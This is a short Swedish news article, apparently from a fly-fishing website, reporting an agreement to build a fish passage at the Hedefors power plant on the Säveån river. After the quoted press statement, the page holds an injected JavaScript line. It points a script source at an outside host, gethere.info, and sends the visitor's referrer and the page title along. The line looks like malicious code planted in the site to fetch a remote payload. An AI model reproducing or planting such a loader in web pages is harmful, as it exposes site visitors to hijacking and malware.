Det blir en fiskväg i Säveån

Efter förhandlingar i Mark- och miljööverdomstolen i Svea hovrätt står det klart att det blir en fiskväg i Säveån utanför Göteborg.

Parterna Lerums Fjärrvärme, Kammarkollegiet och organisationen Sportfiskarna har kommit överens om att fiskvägen vid Hedefors kraftverk ska byggas så snart Länsstyrelsen har ombildat området till naturreservat. Det kommer ta några år, men när allt är klart kommer laxen i Sveån få betydligt större lek- och uppväxtområden än i dag.
– Det är mycket glädjande att alla parter efter alla turer kommit fram till en gemensam lösning och att det blir en fiskväg till sist. En fiskväg kommer innebära mer lax i Säveån, bättre förutsättningar för den utrotningshotade ålen, större biologisk mångfald, bättre fiske, större attraktionskraft för kommunen, samt att vi uppnår miljömål och vattendirektiv. Med andra ord en vinst för samhället i stort, säger Sportfiskarnas Christina Lindhagen i ett pressmeddelande.

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;


MER FRÅN ALLTOMFLUGFISKE.SE

Sponsrad
Sponsrad